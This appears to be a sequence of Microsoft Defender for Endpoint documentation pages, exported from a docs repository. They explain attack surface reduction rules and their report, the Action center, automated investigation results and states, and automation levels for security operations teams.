--- **Files selected** The number of files you've selected for exclusion-- **(_number of_) detections** States the expected reduction in detections after adding the selected exclusion(s). The reduction in detections is represented graphically for **Actual detections** and **Detections after exclusions**-- **(_number of_) affected devices** States the expected reduction in devices that report detections for the selected exclusions.-
-The Add exclusion page has two buttons for actions that can be used on any detected files (after selection). You can:
--- **Add exclusion** which will open Microsoft Intune ASR policy page. For more information, see: [Intune](enable-attack-surface-reduction.md) in "Enable ASR rules alternate configuration methods."-- **Get exclusion paths** which will download file paths in a csv format-
->:::image type="content" source="media/attack-surface-reduction-rules-report-main-add-exclusions-flyout.png" alt-text="Shows the ASR rules report add exclusions tab flyout impact summary" lightbox="media/attack-surface-reduction-rules-report-main-add-exclusions-flyout.png":::
-
-## See also
--- [Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)-- [Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)-- [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)-- [Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)-- [Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)-- [Attack surface reduction \(ASR\) rules report](attack-surface-reduction-rules-report.md)-- [Attack surface reduction rules reference](attack-surface-reduction-rules-reference.md)
security Attack Surface Reduction https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/attack-surface-reduction.md
- Title: Use attack surface reduction rules to prevent malware infection
-description: Attack surface reduction rules can help prevent exploits from using apps and scripts to infect devices with malware.
----------- m365-security-- tier2-- mde-asr Previously updated : 11/22/2023--
-# Attack surface reduction rules overview
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-## Why attack surface reduction rules are important
-
-Your organization's attack surface includes all the places where an attacker could compromise your organization's devices or networks. Reducing your attack surface means protecting your organization's devices and network, which leaves attackers with fewer ways to perform attacks. Configuring attack surface reduction rules in Microsoft Defender for Endpoint can help!
-
-Attack surface reduction rules target certain software behaviors, such as:
--- Launching executable files and scripts that attempt to download or run files-- Running obfuscated or otherwise suspicious scripts-- Performing behaviors that apps don't usually initiate during normal day-to-day work-
-Such software behaviors are sometimes seen in legitimate applications. However, these behaviors are often considered risky because they're commonly abused by attackers through malware. Attack surface reduction rules can constrain software-based risky behaviors and help keep your organization safe.
-
-For a sequential, end-to-end process of how to manage attack surface reduction rules, see:
--- [Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)-- [Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)-- [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)-- [Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)-- [Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)-
-## Assess rules before deployment
-
-You can assess how an attack surface reduction rule might affect your network by opening the security recommendation for that rule in [Microsoft Defender Vulnerability Management](/windows/security/threat-protection/).
--
-In the recommendation details pane, check for user impact to determine what percentage of your devices can accept a new policy enabling the rule in blocking mode without adversely affecting productivity.
-
-See [Requirements](enable-attack-surface-reduction.md#requirements) in the "Enable attack surface reduction rules" article for information about supported operating systems and other requirement information.
-
-## Audit mode for evaluation
-
-### Audit mode
-
-Use [audit mode](audit-windows-defender.md) to evaluate how attack surface reduction rules would affect your organization if enabled. Run all rules in audit mode first so you can understand how they affect your line-of-business applications. Many line-of-business applications are written with limited security concerns, and they might perform tasks in ways that seem similar to malware.
-
-### Exclusions
-
-By monitoring audit data and [adding exclusions](attack-surface-reduction-rules-deployment-test.md) for necessary applications, you can deploy attack surface reduction rules without reducing productivity.
-
-### Per-rule exclusions
-
-For information about configuring per-rule exclusions, see the section titled **Configure attack surface reduction rules per-rule exclusions** in the article [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md).
-
-## Warn mode for users
-
-(**NEW**!) Prior to warn mode capabilities, attack surface reduction rules that are enabled could be set to either audit mode or block mode. With the new warn mode, whenever content is blocked by an attack surface reduction rule, users see a dialog box that indicates the content is blocked. The dialog box also offers the user an option to unblock the content. The user can then retry their action, and the operation completes. When a user unblocks content, the content remains unblocked for 24 hours, and then blocking resumes.
-
-Warn mode helps your organization have attack surface reduction rules in place without preventing users from accessing the content they need to perform their tasks.
-
-### Requirements for warn mode to work
-
-Warn mode is supported on devices running the following versions of Windows:
--- [Windows 10, version 1809](/windows/whats-new/whats-new-windows-10-version-1809) or later-- Windows 11-- [Windows Server, version 1809](/windows-server/get-started/whats-new-in-windows-server-1809) or later-
-Microsoft Defender Antivirus must be running with real-time protection in [Active mode](/windows/security/threat-protection/microsoft-defender-antivirus/microsoft-defender-antivirus-compatibility#functionality-and-features-available-in-each-state).
-
-Also, make sure [Microsoft Defender Antivirus and antimalware updates](/windows/security/threat-protection/microsoft-defender-antivirus/manage-updates-baselines-microsoft-defender-antivirus#monthly-platform-and-engine-versions) are installed.
--- Minimum platform release requirement: `4.18.2008.9`-- Minimum engine release requirement: `1.1.17400.5`-
-For more information and to get your updates, see [Update for Microsoft Defender antimalware platform](https://support.microsoft.com/help/4052623/update-for-microsoft-defender-antimalware-platform).
-
-### Cases where warn mode isn't supported
-
-Warn mode isn't supported for three attack surface reduction rules when you configure them in Microsoft Intune. (If you use Group Policy to configure your attack surface reduction rules, warn mode is supported.) The three rules that don't support warn mode when you configure them in Microsoft Intune are as follows:
--- [Block JavaScript or VBScript from launching downloaded executable content](attack-surface-reduction-rules-reference.md#block-javascript-or-vbscript-from-launching-downloaded-executable-content) (GUID `d3e037e1-3eb8-44c8-a917-57927947596d`)-- [Block persistence through WMI event subscription](attack-surface-reduction-rules-reference.md#block-persistence-through-wmi-event-subscription) (GUID `e6db77e5-3df2-4cf1-b95a-636979351e5b`)-- [Use advanced protection against ransomware](attack-surface-reduction-rules-reference.md#use-advanced-protection-against-ransomware) (GUID `c1db55ab-c21a-4637-bb3f-a12568109d35`)-
-Also, warn mode isn't supported on devices running older versions of Windows. In those cases, attack surface reduction rules that are configured to run in warn mode runs in block mode.
-
-## Notifications and alerts
-
-Whenever an attack surface reduction rule is triggered, a notification is displayed on the device. You can [customize the notification](attack-surface-reduction-rules-deployment-implement.md#customize-attack-surface-reduction-rules) with your company details and contact information.
-
-Also, when certain attack surface reduction rules are triggered, alerts are generated.
-
-Notifications and any alerts that are generated can be viewed in the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>.
-
-For specific details about notification and alert functionality, see: [Per rule alert and notification details](attack-surface-reduction-rules-reference.md#per-asr-rule-alert-and-notification-details), in the article **Attack surface reduction rules reference**.
-
-## Advanced hunting and attack surface reduction events
-
-You can use advanced hunting to view attack surface reduction events. To streamline the volume of incoming data, only unique processes for each hour are viewable with advanced hunting. The time of an attack surface reduction event is the first time that event is seen within the hour.
-
-For example, suppose that an attack surface reduction event occurs on 10 devices during the 2:00 PM hour. Suppose that the first event occurred at 2:15, and the last at 2:45. With advanced hunting, you see one instance of that event (even though it actually occurred on 10 devices), and its timestamp will be 2:15 PM.
-
-For more information about advanced hunting, see [Proactively hunt for threats with advanced hunting](advanced-hunting-overview.md).
-
-## Attack surface reduction features across Windows versions
-
-You can set attack surface reduction rules for devices that are running any of the following editions and versions of Windows:
--- Windows 10 Pro, [version 1709](/windows/whats-new/whats-new-windows-10-version-1709) or later-- Windows 10 Enterprise, [version 1709](/windows/whats-new/whats-new-windows-10-version-1709) or later-- Windows Server, [version 1803 (Semi-Annual Channel)](/windows-server/get-started/whats-new-in-windows-server-1803) or later-- [Windows Server 2022](/windows-server/get-started/whats-new-in-windows-server-2022) -- [Windows Server 2019](/windows-server/get-started-19/whats-new-19)-- [Windows Server 2016](/windows-server/get-started/whats-new-in-windows-server-2016)-- [Windows Server 2012 R2](/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh801901(v=ws.11))-
- > [!NOTE]
- > Windows Server 2016 and Windows Server 2012 R2 will need to be onboarded using the instructions in [Onboard Windows servers](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016) for this feature to work.
-
-Although attack surface reduction rules don't require a [Windows E5 license](/windows/deployment/deploy-enterprise-licenses), if you have Windows E5, you get advanced management capabilities. The advanced capabilities - available only in Windows E5 - include:
--- The monitoring, analytics, and workflows available in [Defender for Endpoint](microsoft-defender-endpoint.md)-- The reporting and configuration capabilities in [Microsoft Defender XDR](/microsoft-365/security/defender/overview-security-center).-
-These advanced capabilities aren't available with a Windows Professional or Windows E3 license. However, if you do have those licenses, you can use Event Viewer and Microsoft Defender Antivirus logs to review your attack surface reduction rule events.
-
-<a name='review-attack-surface-reduction-events-in-the-microsoft-365-defender-portal'></a>
-
-## Review attack surface reduction events in the Microsoft Defender portal
-
-Defender for Endpoint provides detailed reporting for events and blocks as part of alert investigation scenarios.
-
-You can query Defender for Endpoint data in [Microsoft Defender XDR](microsoft-defender-endpoint.md) by using [advanced hunting](/microsoft-365/security/defender/advanced-hunting-query-language).
-
-Here's an example query:
-
-```kusto
-DeviceEvents
-| where ActionType startswith 'Asr'
-```
-
-## Review attack surface reduction events in Windows Event Viewer
-
-You can review the Windows event log to view events generated by attack surface reduction rules:
-
-1. Download the [Evaluation Package](https://aka.ms/mp7z2w) and extract the file *cfa-events.xml* to an easily accessible location on the device.
-
-2. Enter the words, *Event Viewer*, into the Start menu to open the Windows Event Viewer.
-
-3. Under **Actions**, select **Import custom view...**.
-
-4. Select the file *cfa-events.xml* from where it was extracted. Alternatively, [copy the XML directly](event-views.md).
-
-5. Select **OK**.
-
-You can create a custom view that filters events to only show the following events, all of which are related to controlled folder access:
-
-|Event ID|Description|
-|||
-|5007|Event when settings are changed|
-|1121|Event when rule fires in Block-mode|
-|1122|Event when rule fires in Audit-mode|
-
-The "engine version" listed for attack surface reduction events in the event log, is generated by Defender for Endpoint, not by the operating system. Defender for Endpoint is integrated with Windows 10 and Windows 11, so this feature works on all devices with Windows 10 or Windows 11 installed.
-
-## See also
--- [Attack surface reduction rules deployment overview](attack-surface-reduction-rules-deployment.md)-- [Plan attack surface reduction rules deployment](attack-surface-reduction-rules-deployment-plan.md)-- [Test attack surface reduction rules](attack-surface-reduction-rules-deployment-test.md)-- [Enable attack surface reduction rules](attack-surface-reduction-rules-deployment-implement.md)-- [Operationalize attack surface reduction rules](attack-surface-reduction-rules-deployment-operationalize.md)-- [Attack surface reduction rules report](attack-surface-reduction-rules-report.md)-- [Exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md)--
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
->
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Auto Investigation Action Center https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/auto-investigation-action-center.md
- Title: Visit the Action center to see remediation actions
-description: Use the action center to view details and results following an automated investigation
-------- m365-security-- tier3-- mde-edr--- Previously updated : 02/21/2024--
-# Visit the Action center to see remediation actions
-
-During and after an automated investigation, remediation actions for threat detections are identified. Depending on the particular threat and how [automated investigation and remediation capabilities are configured](configure-automated-investigations-remediation.md) for your organization, some remediation actions are taken automatically, and others require approval. If you're part of your organization's security operations team, you can view pending and completed [remediation actions](manage-auto-investigation.md#remediation-actions) in the **Action center**.
-
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-## The unified Action center
-
-Recently, the Action center was updated. You now have a unified Action center experience. To access your Action center, go to [https://security.microsoft.com/action-center](https://security.microsoft.com/action-center) and sign in.
--
-### What's changed?
-
-The following table compares the new, unified Action center to the previous Action center.
-
-|The new, unified Action center |The previous Action center |
-|||
-|Lists pending and completed actions for devices and email in one location <br/>([Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) plus [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365))|Lists pending and completed actions for devices <br/> ([Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) only) |
-|Is located at:<br/>[https://security.microsoft.com/action-center](https://security.microsoft.com/action-center) |Is located at:<br/>[https://securitycenter.windows.com/action-center](https://securitycenter.windows.com/action-center) |
-| In the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a>, choose **Action center**. <p>:::image type="content" source="media/action-center-nav-new.png" alt-text="The navigation pane to the Action Center in the Microsoft Defender portal" lightbox="media/action-center-nav-new.png"::: | In the Microsoft Defender portal, choose **Automated investigations** > **Action center**. <p>:::image type="content" source="media/action-center-nav-old.png" alt-text="An older version of the navigation pane to the Action Center in the Microsoft Defender portal" lightbox="media/action-center-nav-old.png"::: |
-
-The unified Action center brings together remediation actions across Defender for Endpoint and Defender for Office 365. It defines a common language for all remediation actions, and provides a unified investigation experience.
-
-You can use the unified Action center if you have appropriate permissions and one or more of the following subscriptions:
--- [Microsoft Defender XDR](/microsoft-365/security/mtp/microsoft-threat-protection)-- [Defender for Endpoint](microsoft-defender-endpoint.md)-- [Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365)-- [Defender for Business](../defender-business/mdb-overview.md)-
-## Using the Action center
-
-To get to the unified Action center in the improved Microsoft Defender portal:
-
-1. Go to the <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender portal</a> and sign in.
-
-2. In the navigation pane, select **Action center**.
-
-3. Use the **Pending actions** and **History** tabs. The following table summarizes what you'll see on each tab:
-
- |Tab|Description|
- |||
- |**Pending**|Displays a list of actions that require attention. You can approve or reject actions one at a time, or select multiple actions if they have the same type of action (such as **Quarantine file**). <p> **TIP**: Make sure to [review and approve (or reject) pending actions](manage-auto-investigation.md) as soon as possible so that your automated investigations can complete in a timely manner.|
- |**History**|Serves as an audit log for actions that were taken, such as: <ul><li>Remediation actions that were taken as a result of automated investigations</li><li>Remediation actions that were approved by your security operations team</li><li>Commands that were run and remediation actions that were applied during Live Response sessions</li><li>Remediation actions that were taken by threat protection features in Microsoft Defender Antivirus</li></ul> <p> Provides a way to undo certain actions (see [Undo completed actions](manage-auto-investigation.md#undo-completed-actions)).|
-
-4. To customize, sort, filter, and export data in the Action center, take one or more of the following steps:
-
- :::image type="content" source="media/new-action-center-columnsfilters.png" alt-text="The Action center with Columns and filters" lightbox="media/new-action-center-columnsfilters.png":::
-
- - Select a column heading to sort items in ascending or descending order.
- - Use the time period filter to view data for the past day, week, 30 days, or 6 months.
- - Choose the columns that you want to view.
- - Specify how many items to include on each page of data.
- - Use filters to view just the items you want to see.
- - Select **Export** to export results to a .csv file.
-
-## Next steps
--- [View and approve remediation actions](manage-auto-investigation.md)-- [See the interactive guide: Investigate and remediate threats with Microsoft Defender for Endpoint](https://aka.ms/MDATP-IR-Interactive-Guide)-
-## See also
--- [Address false positives/negatives in Microsoft Defender for Endpoint](defender-endpoint-false-positives-negatives.md)-
security Autoir Investigation Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/autoir-investigation-results.md
- Title: View the details and results of an automated investigation
-description: During and after an automated investigation, you can view the results and key findings
-- NOCSH-------- m365-security-- tier3-- mde-edr---- autoir-- admindeeplinkDEFENDER- Previously updated : 02/21/2024--
-# View the details and results of an automated investigation
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-With Microsoft Defender for Endpoint, when an [automated investigation](automated-investigations.md) runs, details about that investigation are available both during and after the automated investigation process. If you have the necessary permissions, you can view those details in an investigation details view. The investigation details view provides you with up-to-date status and the ability to approve any pending actions.
-
-## (NEW!) Unified investigation page
-
-The investigation page has recently been updated to include information across your devices, email, and collaboration content. The new, unified investigation page defines a common language and provides a unified experience for automatic investigations across [Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) and [Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/defender-for-office-365).
-
-> [!TIP]
-> To learn more about what's changing, see [(NEW!) Unified investigation page](/microsoft-365/security/mtp/mtp-autoir-results).
-
-## Open the investigation details view
-
-You can open the investigation details view by using one of the following methods:
--- [Select an item in the Action center](#select-an-item-in-the-action-center)-- [Select an investigation from an incident details page](#open-an-investigation-from-an-incident-details-page)-
-### Select an item in the Action center
-
-The improved [Action center](auto-investigation-action-center.md) brings together [remediation actions](manage-auto-investigation.md#remediation-actions) across your devices, email & collaboration content, and identities. Listed actions include remediation actions that were taken automatically or manually. In the Action center, you can view actions that are awaiting approval and actions that were already approved or completed. You can also navigate to more details, such as an investigation page.
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> and sign in.
-2. In the navigation pane, choose **Action center**.
-3. On either the **Pending** or **History** tab, select an item. Its flyout pane opens.
-4. Review the information in the flyout pane, and then take one of the following steps:
- - Select **Open investigation page** to view more details about the investigation.
- - Select **Approve** to initiate a pending action.
- - Select **Reject** to prevent a pending action from being taken.
- - Select **Go hunt** to go into [Advanced hunting](advanced-hunting-overview.md).
-
-### Open an investigation from an incident details page
-
-Use an incident details page to view detailed information about an incident, including alerts that were triggered information about any affected devices, user accounts, or mailboxes.
-
-1. Go to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> and sign in.
-2. In the navigation pane, choose **Incidents & alerts** \> **Incidents**.
-3. Select an item in the list, and then choose **Open incident page**.
-4. Select the **Investigations** tab, and then select an investigation in the list. Its flyout pane opens.
-5. Select **Open investigation page**.
-
-## Investigation details
-
-Use the investigation details view to see past, current, and pending activity pertaining to an investigation. The investigation details view resembles the following image:
-
-In the Investigation details view, you can see information on the **Investigation graph**, **Alerts**, **Devices**, **Identities**, **Key findings**, **Entities**, **Log**, and **Pending actions** tabs, described in the following table.
-
-> [!NOTE]
-> - The specific tabs you see in an investigation details page depends on what your subscription includes. For example, if your subscription does not include Microsoft Defender for Office 365 Plan 2, you won't see a **Mailboxes** tab.
->
-> - Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-|Tab|Description|
-|||
-|**Investigation graph**|Provides a visual representation of the investigation. Depicts entities and lists threats found, along with alerts and whether any actions are awaiting approval. <p> You can select an item on the graph to view more details. For example, selecting the **Evidence** icon takes you to the **Evidence** tab, where you can see detected entities and their verdicts.|
-|**Alerts**|Lists alerts associated with the investigation. Alerts can come from threat protection features on a user's device, in Office apps, Defender for Cloud Apps, and other Microsoft Defender XDR features.|
-|**Devices**|Lists devices included in the investigation along with their remediation level. (Remediation levels correspond to the [automation level for device groups](automation-levels.md).)|
-|**Mailboxes**|Lists mailboxes that are impacted by detected threats.|
-|**Users**|Lists user accounts that are impacted by detected threats.|
-|**Evidence**|Lists pieces of evidence raised by alerts/investigations. Includes verdicts (*Malicious*, *Suspicious*, or *No threats found*) and remediation status.|
-|**Entities**|Provides details about each analyzed entity, including a verdict for each entity type (*Malicious*, *Suspicious*, or *No threats found*).|
-|**Log**|Provides a chronological, detailed view of all the investigation actions taken after an alert was triggered.|
-|**Pending actions**|Lists items that require approval to proceed. Go to the Action center (<https://security.microsoft.com/action-center>) to approve pending actions.|
-
-## Investigation states
-
-The following table lists investigation states and what they indicate.
--
-|Investigation state |Definition |
-|||
-|Benign | Artifacts were investigated and a determination was made that no threats were found.|
-|PendingResource | An automated investigation is paused because either a remediation action is pending approval, or the device on which an artifact was found is temporarily unavailable.|
-|UnsupportedAlertType | An automated investigation is not available for this type of alert. Further investigation can be done manually, by using advanced hunting. |
-|Failed | At least one investigation analyzer ran into a problem where it couldn't complete the investigation. If an investigation fails after remediation actions were approved, the remediation actions might still have succeeded.|
-|Successfully remediated| An automated investigation completed, and all remediation actions were completed or approved.|
-
-To provide more context about how investigation states show up, the following table lists alerts and their corresponding automated investigation state. This table is included as an example of what a security operations team might see in the Microsoft Defender portal.
-
-|Alert name | Severity | Investigation state | Status | Category |
-|--|-||--|-|
-|Malware was detected in a wim disk image file|Informational|Benign|Resolved|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a rar archive file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a rar archive file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Wpakill hacktool was prevented|Low|Failed|New|Malware|
-|GendowsBatch hacktool was prevented|Low|Failed|New|Malware|
-|Keygen hacktool was prevented|Low|Failed|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a zip archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in a rar archive file|Informational|PendingResource|New|Malware|
-|Malware was detected in an iso disc image file|Informational|PendingResource|New|Malware|
-|Malware was detected in an iso disc image file|Informational|PendingResource|New|Malware|
-|Malware was detected in a pst outlook data file|Informational|UnsupportedAlertType|New|Malware|
-|Malware was detected in a pst outlook data file|Informational|UnsupportedAlertType|New|Malware|
-|MediaGet detected|Medium|PartiallyInvestigated|New|Malware|
-|TrojanEmailFile|Medium|SuccessfullyRemediated|Resolved|Malware|
-|CustomEnterpriseBlock malware was prevented|Informational|SuccessfullyRemediated|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|SuccessfullyRemediated|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|SuccessfullyRemediated|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|SuccessfullyRemediated|Resolved|Malware|
-|TrojanEmailFile|Medium|Benign|Resolved|Malware|
-|CustomEnterpriseBlock malware was prevented|Informational|UnsupportedAlertType|New|Malware|
-|CustomEnterpriseBlock malware was prevented|Informational|SuccessfullyRemediated|Resolved|Malware|
-|TrojanEmailFile|Medium|SuccessfullyRemediated|Resolved|Malware|
-|TrojanEmailFile|Medium|Benign|Resolved|Malware|
-|An active CustomEnterpriseBlock malware was blocked|Low|PendingResource|New|Malware|
-
-## See also
--- [Review remediation actions following an automated investigation](manage-auto-investigation.md)-- [View and organize the Microsoft Defender for Endpoint Incidents queue](view-incidents-queue.md)
security Automated Investigations https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automated-investigations.md
- Title: Use automated investigations to investigate and remediate threats
-description: Understand the automated investigation flow in Microsoft Defender for Endpoint.
---- Previously updated : 08/31/2022---- m365-security-- tier3-- mde-edr----
-# Overview of automated investigations
--
-**Applies to:**
-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-**Platforms**
-- Windows-
-Want to see how it works? Watch the following video:
-
-> [!VIDEO https://www.microsoft.com/videoplayer/embed/RE4bOeh]
-
-The technology in automated investigation uses various inspection algorithms and is based on processes that are used by security analysts. AIR capabilities are designed to examine alerts and take immediate action to resolve breaches. AIR capabilities significantly reduce alert volume, allowing security operations to focus on more sophisticated threats and other high-value initiatives. All remediation actions, whether pending or completed, are tracked in the [Action center](auto-investigation-action-center.md). In the Action center, pending actions are approved (or rejected), and completed actions can be undone if needed.
-
-This article provides an overview of AIR and includes links to next steps and additional resources.
-
-> [!TIP]
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-automated-investigations-abovefoldlink)
-
-## How the automated investigation starts
-
-An automated investigation can start when an alert is triggered or when a security operator initiates the investigation.
-
-|Situation|What happens|
-|||
-|An alert is triggered|In general, an automated investigation starts when an [alert](review-alerts.md) is triggered, and an [incident](view-incidents-queue.md) is created. For example, suppose a malicious file resides on a device. When that file is detected, an alert is triggered, and incident is created. An automated investigation process begins on the device. As other alerts are generated because of the same file on other devices, they are added to the associated incident and to the automated investigation.|
-|An investigation is started manually|An automated investigation can be started manually by your security operations team. For example, suppose a security operator is reviewing a list of devices and notices that a device has a high risk level. The security operator can select the device in the list to open its flyout, and then select **Initiate Automated Investigation**.|
-
-## How an automated investigation expands its scope
-
-While an investigation is running, any other alerts generated from the device are added to an ongoing automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.
-
-If an incriminated entity is seen in another device, the automated investigation process expands its scope to include that device, and a general security playbook starts on that device. If 10 or more devices are found during this expansion process from the same entity, then that expansion action requires an approval, and is visible on the **Pending actions** tab.
-
-## How threats are remediated
-
-As alerts are triggered, and an automated investigation runs, a verdict is generated for each piece of evidence investigated. Verdicts can be:
--- *Malicious*;-- *Suspicious*; or-- *No threats found*.-
-As verdicts are reached, automated investigations can result in one or more remediation actions. Examples of remediation actions include sending a file to quarantine, stopping a service, removing a scheduled task, and more. To learn more, see [Remediation actions](manage-auto-investigation.md#remediation-actions).
-
-Depending on the [level of automation](automation-levels.md) set for your organization, as well as other security settings, remediation actions can occur automatically or only upon approval by your security operations team. Additional security settings that can affect automatic remediation include [protection from potentially unwanted applications](/windows/security/threat-protection/microsoft-defender-antivirus/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus) (PUA).
-
-All remediation actions, whether pending or completed, are tracked in the [Action center](auto-investigation-action-center.md). If necessary, your security operations team can undo a remediation action. To learn more, see [Review and approve remediation actions following an automated investigation](/microsoft-365/security/defender-endpoint/manage-auto-investigation).
-
-> [!TIP]
-> Check out the new, unified investigation page in the Microsoft Defender portal. To learn more, see [Unified investigation page](/microsoft-365/security/defender/m365d-autoir-results#new-unified-investigation-page).
-
-## Requirements for AIR
-
-Your subscription must include [Defender for Endpoint](microsoft-defender-endpoint.md) or [Defender for Business](../defender-business/mdb-overview.md).
-
-> [!NOTE]
-> Automated investigation and response requires Microsoft Defender Antivirus for running in passive mode or active mode. If Microsoft Defender Antivirus is disabled or uninstalled, Automated Investigation and Response will not function correctly.
-
-Currently, AIR only supports the following OS versions:
--- Windows Server 2012 R2 (Preview)-- Windows Server 2016 (Preview)-- Windows Server 2019-- Windows Server 2022-- Windows 10, version 1709 (OS Build 16299.1085 with [KB4493441](https://support.microsoft.com/help/4493441/windows-10-update-kb4493441)) or later-- Windows 10, version 1803 (OS Build 17134.704 with [KB4493464](https://support.microsoft.com/help/4493464/windows-10-update-kb4493464)) or later-- Windows 10, version [1803](/windows/release-information/status-windows-10-1809-and-windows-server-2019) or later-- Windows 11-
-> [!NOTE]
-> Automated investigation and response on Windows Server 2012 R2 and Windows Server 2016 requires the [Unified Agent](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution) to be installed.
-
-## Next steps
--- [Learn more about automation levels](automation-levels.md)-- [See the interactive guide: Investigate and remediate threats with Microsoft Defender for Endpoint](https://aka.ms/MDATP-IR-Interactive-Guide)-- [Configure automated investigation and remediation capabilities in Microsoft Defender for Endpoint](configure-automated-investigations-remediation.md)-
-## See also
--- [PUA protection](/windows/security/threat-protection/microsoft-defender-antivirus/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus)-- [Automated investigation and response in Microsoft Defender for Office 365](/microsoft-365/security/office-365-security/air-about)-- [Automated investigation and response in Microsoft Defender XDR](/microsoft-365/security/defender/m365d-autoir)
security Automation Levels https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/automation-levels.md
- Title: Automation levels in automated investigation and remediation
-description: Get an overview of automation levels and how they work in Microsoft Defender for Endpoint
---- Previously updated : 07/27/2023---- m365-security-- tier3-- mde-edr----
-# Automation levels in automated investigation and remediation capabilities
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-Automated investigation and remediation (AIR) capabilities in Microsoft Defender for Business are preconfigured and aren't configurable. In Microsoft Defender for Endpoint, you can configure AIR to one of several levels of automation. Your automation level affects whether remediation actions following AIR investigations are taken automatically or only upon approval.
